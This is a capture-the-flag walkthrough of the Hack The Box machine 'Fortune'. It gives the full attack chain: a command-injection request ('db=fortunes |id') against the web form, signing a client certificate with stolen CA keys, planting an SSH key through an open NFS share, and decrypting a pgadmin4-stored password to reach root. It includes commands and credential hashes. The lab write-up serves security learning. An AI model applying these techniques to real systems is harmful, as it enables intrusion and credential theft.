Fortune : Hackthebox Walkthrough

TL;DR; Fortune is the retired vulnerable VM from the Hackthebox, it is a very interesting VM which needs to sign the SSL certificate using the Certificate Authority files found using RCE Vulnerability in the http(80) service to access the https(443) service, From there onwards downloading SSH private key from https service gives us the elevated access to network, then we use NFS server to write SSH authorized_keys which gives user, and then we exploit pgadmin4 to gain root.

Enumeration

Let's do the basic enum

$ cat masscan.txt 
Discovered open port 443/tcp on 10.10.10.127                                   
Discovered open port 80/tcp on 10.10.10.127 
Discovered open port 22/tcp on 10.10.10.127 

$cat nmap.txt
Nmap 7.60 scan initiated Fri Aug  2 21:29:24 2019 as: $nmap -n -v -Pn -p80,443,22 -A --reason -oN nmap.txt 10.10.10.127
Nmap scan report for 10.10.10.127
Host is up, received user-set (0.63s latency).

PORT    STATE SERVICE    REASON  VERSION
22/tcp  open  ssh        syn-ack OpenSSH 7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 07:ca:21:f4:e0:d2:c6:9e:a8:f7:61:df:d7:ef:b1:f4 (RSA)
|   256 30:4b:25:47:17:84:af:60:e2:80:20:9d:fd:86:88:46 (ECDSA)
|_  256 93:56:4a:ee:87:9d:f6:5b:f9:d9:25:a6:d8:e0:08:7e (EdDSA)
80/tcp  open  http       syn-ack OpenBSD httpd
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: OpenBSD httpd
|_http-title: Fortune
443/tcp open  ssl/https? syn-ack
|_ssl-date: TLS randomness does not represent time

HTTPS service need certificates to access, but after doing some recon I found RCE on HTTP Service
Request

POST /select HTTP/1.1
Host: fortune.htb
Content-Length: 17
Cache-Control: max-age=0
Origin: http://fortune.htb
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://fortune.htb
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

db=fortunes%20|id

Response
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=utf-8
Date: Sat, 03 Aug 2019 15:41:27 GMT
Server: OpenBSD httpd
Content-Length: 350

<!DOCTYPE html>
<html>
<head>
<title>Your fortune</title>
<meta name='viewport' content='width=device-width, initial-scale=1'>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
</head>
<body>
<h2>Your fortune is:</h2>
<p><pre>

uid=512(_fortune) gid=512(_fortune) groups=512(_fortune)


</pre><p>
<p>Try <a href='/'>again</a>!</p>
</body>
</html>

Though, I got the RCE I am not able to get the Reverse Shell, So I enumerated using automated script to traverse and read the files, during the enum I found Certificate Authority Keys, yaa let's use this CA to sign a certificate for us. Here are the commands to generate pkcs12 file

$openssl genrsa -aes256 -out fortune.htb.key.pem 2048 # generate a private key
$openssl req -config openssl.cnf -key fortune.htb.key.pem -new -sha256 -out fortune.htb.csr.pem #generating certificat, common name must be fortune.htb
$#Sign the certificate using the CA(intermediate.cert.pem) and CAkey(intermediate.key.pem) which are downloaded from RCE
$openssl x509 -req -in fortune.htb.csr.pem -CA intermediate.cert.pem -CAkey intermediate.key.pem -out fortune.htb.cert.pem -days 365 -set_serial 01 
$#Let's create a pkcs12 file
$openssl pkcs12 -export -clcerts -in fortune.htb.cert.pem -inkey fortune.htb.key.pem -out fortune.htb.p12

We just have to import this p12 file to chrome and we are good to go to access HTTPS service. At the home page we see the below thing

You will need to use the local authpf service to obtain 
elevated network access. If you do not already have the appropriate
SSH key pair, then you will need to generate
one and configure your local system appropriately to proceed.

Ok its using authpf service which is a user shell for authenticating gateways, which means we can access the network only if we are authentcated using ssh. Let's download the ssh private key and login, then we will get the elevated network access

$ ssh nfsuser@10.10.10.127 -i id_rsa 
Last login: Sat Aug  3 08:09:17 2019 from 10.10.15.159
Hello nfsuser. You are authenticated from host "10.10.14.178"

Let's do our port scan one more time, we may found other services. Doing masscan giving us some more ports

$cat masscanElev.txt
Discovered open port 929/tcp on 10.10.10.127                                   
Discovered open port 443/tcp on 10.10.10.127                                   
Discovered open port 111/tcp on 10.10.10.127                                   
Discovered open port 80/tcp on 10.10.10.127                                    
Discovered open port 8081/tcp on 10.10.10.127                                  
Discovered open port 2049/tcp on 10.10.10.127                                  
Discovered open port 22/tcp on 10.10.10.127  

Lets do the detailed scan using nmap.

$cat nmapElev.txt

PORT     STATE  SERVICE    REASON       VERSION
22/tcp   open   ssh        syn-ack      OpenSSH 7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 07:ca:21:f4:e0:d2:c6:9e:a8:f7:61:df:d7:ef:b1:f4 (RSA)
|   256 30:4b:25:47:17:84:af:60:e2:80:20:9d:fd:86:88:46 (ECDSA)
|_  256 93:56:4a:ee:87:9d:f6:5b:f9:d9:25:a6:d8:e0:08:7e (EdDSA)
80/tcp   open   http       syn-ack      OpenBSD httpd
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: OpenBSD httpd
|_http-title: Fortune
111/tcp  open   rpcbind    syn-ack      2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3         2049/tcp  nfs
|   100003  2,3         2049/udp  nfs
|   100005  1,3          882/tcp  mountd
|_  100005  1,3         1002/udp  mountd
443/tcp  open   ssl/https? syn-ack
|_ssl-date: TLS randomness does not represent time
929/tcp  closed unknown    conn-refused
2049/tcp open   nfs        syn-ack      2-3 (RPC #100003)
8081/tcp open   http       syn-ack      OpenBSD httpd
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: OpenBSD httpd
|_http-title: pgadmin4

There is nothing on 8081, but there is an nfs server running. Below command gives the registered RPC programs.

$rpcinfo -p 10.10.10.127
   program vers proto   port  service
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100005    1   udp   1002  mountd
    100005    3   udp   1002  mountd
    100005    1   tcp    882  mountd
    100005    3   tcp    882  mountd
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs

Lets know what we can mount.

$showmount -e 10.10.10.127
Export list for 10.10.10.127:
/home (everyone)

Mounting the /home

$mkdir /tmp/dir
$mount -o nolock -t nfs 10.10.10.127:/hom /tmp/dir 
$cd /tmp/dir
$ls
bob  charlie  nfsuser
$ cd charlie
$ls
mbox  user.txt
$ cd .ssh
$ls
authorized_keys
$nano authorized_keys

I added my public key and logged in as charlie. Got the user.txt here.

$ssh -i id_rsa charlie@fortune.htb
Enter passphrase for key 'id_rsa':
Last login: Sat Aug  3 08:10:24 2019 from 10.10.15.159
OpenBSD 6.4 (GENERIC) #349: Thu Oct 11 13:25:13 MDT 2018

Welcome to OpenBSD: The proactively secure Unix-like operating system.
fortune$ ls
mbox     user.txt
fortune$cat mbox | tail
Hi Charlie,

Thanks for setting-up pgadmin4 for me. Seems to work great so far.
BTW: I set the dba password to the same as root. I hope you don't mind.

Cheers,

Bob

So, as per the hint we have to enumerate pgadmin4. Found a sqlite file pgadmin4.db file at /var/appsrv/pgadmin4/pgadmin4.db. Lets download it.

scp -i id_rsa charlie@10.10.10.127:/var/appsrv/pgadmin4/pgadmin4.db ./pgadmin4.db

Important things in the sqlite database

sqlite> select * from server;
1|2|2|fortune|localhost|5432|postgres|dba|utUU0jkamCZDmqFLOrAuPjFxL0zp8zWzISe5MF0GY/l8Silrmu3caqrtjaVjLQlvFFEgESGz||prefer||||||/.postgresql/postgresql.crt|/.postgresql/postgresql.key|||0||||0||22||0||0|
sqlite> select * from user;
1|charlie@fortune.htb|$pbkdf2-sha512$25000$3hvjXAshJKQUYgxhbA0BYA$iuBYZKTTtTO.cwSvMwPAYlhXRZw8aAn9gBtyNQW3Vge23gNUMe95KqiAyf37.v1lmCunWVkmfr93Wi6.W.UzaQ|1|
2|bob@fortune.htb|$pbkdf2-sha512$25000$z9nbm1Oq9Z5TytkbQ8h5Dw$Vtx9YWQsgwdXpBnsa8BtO5kLOdQGflIZOQysAy7JdTVcRbv/6csQHAJCAIJT9rLFBawClFyMKnqKNL5t3Le9vg|1|
sqlite> 

So the hint in mbox is password of dba and root is same, we know the encrypted password using sqlite3 and by doing some code review we get to know that it is using AES CFB MODE to encrypt and store the password. To decrypt this we need key, I found a bit difficult to find the key, but I somehow found that it is using the user password as key to decrypt, then it turn out to be bob's encrypted password is the key. Now its easy to decrypt the key. I got the password R3us3**********************ID3A! That's it we got the root. Thank you.